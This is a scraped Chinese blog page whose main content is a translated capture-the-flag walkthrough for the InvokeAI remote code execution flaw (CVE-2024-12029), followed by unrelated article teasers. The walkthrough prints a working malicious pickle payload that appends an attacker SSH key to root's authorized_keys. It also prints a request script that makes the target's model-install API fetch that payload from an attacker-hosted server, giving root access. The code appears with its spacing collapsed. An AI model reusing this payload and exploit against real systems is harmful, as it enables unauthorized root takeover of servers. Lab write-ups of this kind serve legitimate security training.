news 2026/4/16 0:24:30

InvokeAI远程代码执行漏洞实战演练:从漏洞发现到利用

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
InvokeAI远程代码执行漏洞实战演练:从漏洞发现到利用

InvokeAI_RCE | PG Walkthrough

搜索“invokeai_rce”,你很快就能找到CVE-2024-12029。事实证明,“huntr”是新的AI/ML CVE网站。

huntr - 世界上第一个AI/ML漏洞赏金平台
世界上第一个AI/ML漏洞赏金平台
世界上第一个AI/ML漏洞赏金平台
huntr.com^

基本上按照此链接中的概念验证进行操作。解决此靶机的主要技巧是找到该链接。

靶机的描述建议创建一个密钥,并使用载荷将id_rsa.pub上传到root用户的authorized_keys文件中。

首先,使用以下命令创建密钥:
ssh-keygen
复制id_rsa.pub,并将其用于ssh.py中的载荷。

使用ssh.py,如上文链接中的PoC所示,生成载荷。

ckpt文件将把公钥回显到目标机器的root用户的authorized_keys文件中。

importpickleclassPayload:def__reduce__(self):importosreturn(os.system,('echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA0mDlI9bbgZq0XYTKvG+jo/Q6/By7bxTP6VwRqs3sh1 root@kali" >> /root/.ssh/authorized_keys',))defgenerate_payload():# Not .pklwithopen('payload.ckpt','wb')asf:pickle.dump(Payload(),f)generate_payload()

在payload.ckpt所在位置设置一个Web服务器,并在exploit.py中引用它以执行载荷(将攻击者的id_rsa.pub公钥粘贴到目标的root用户authorized_keys文件中)。

importrequests url="http://192.168.159.218:9090/api/v2/models/install"params={"source":"http://192.168.45.227:8080/payload.ckpt","inplace":"true"}response=requests.post(url,params=params,json={})print(response.text)

确保为id_rsa文件赋予必要的权限(chmod 600 id_rsa),然后使用通过ssh-keygen生成的id_rsa密钥以root用户身份进行SSH连接。
CSD0tFqvECLokhw9aBeRqlyK5KMpaklojJBUegXcB9J+/111yYeGSJSiNtXQwSVQ0pW+HI2mbOG2VnyH8b7ErlJ21+8esbpf+7cQT5JJbS3PF4agwWGfdflw3pgF9XrX
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 10:52:55

还在用AI瞎编论文?这7款免费工具提供真实参考文献,查重率超低!

别再让“AI论文焦虑”毁了你的毕业季!这3个错误90%的人都在犯 还在用ChatGPT瞎凑论文段落? 还在为AI生成的内容没有参考文献愁得掉头发? 还在因为查重率超30%被导师打回重写? 如果你点头的频率越来越快,说明你正踩在…

作者头像 李华
网站建设 2026/4/16 14:00:44

手把手教你部署HeyGem数字人视频生成系统并快速上手

手把手教你部署 HeyGem 数字人视频生成系统并快速上手 在短视频内容井喷的今天,企业培训、在线课程、品牌宣传等场景对高质量视频的需求与日俱增。然而,传统制作方式成本高、周期长,而市面上的云服务又存在数据外泄风险和按次计费的压力。有没…

作者头像 李华
网站建设 2026/4/15 21:08:26

2026必备!自考论文难题TOP10 AI论文网站测评

2026必备!自考论文难题TOP10 AI论文网站测评 2026年自考论文写作工具测评:选对工具事半功倍 随着自考论文写作需求的不断增长,越来越多的学生开始依赖AI论文网站来提升效率、优化内容质量。然而,面对市场上琳琅满目的工具&#…

作者头像 李华
网站建设 2026/4/16 12:27:20

【好写作AI】你的英文摘要,还在靠“百度翻译+胆量”硬扛吗?

当你的中文摘要文采斐然,英文版却让审稿人眉头紧锁——“这个作者,到底想说什么?” 别慌,这可能是学术界最普遍的“跨境表达障碍”。好写作AI官方网址:https://www.haoxiezuo.cn/😫 痛点诊断:英…

作者头像 李华
网站建设 2026/4/13 18:10:20

Visual Studio Code也可尝试:现代IDE通用性强

Visual Studio Code 也可尝试:现代 IDE 的通用性与 AI 工程实践 在智能内容生成的浪潮中,数字人视频系统正从实验室走向生产线。这类系统不再是“跑通模型就结束”的研究原型,而是需要稳定运行、支持批量处理、具备良好交互和可维护性的工程产…

作者头像 李华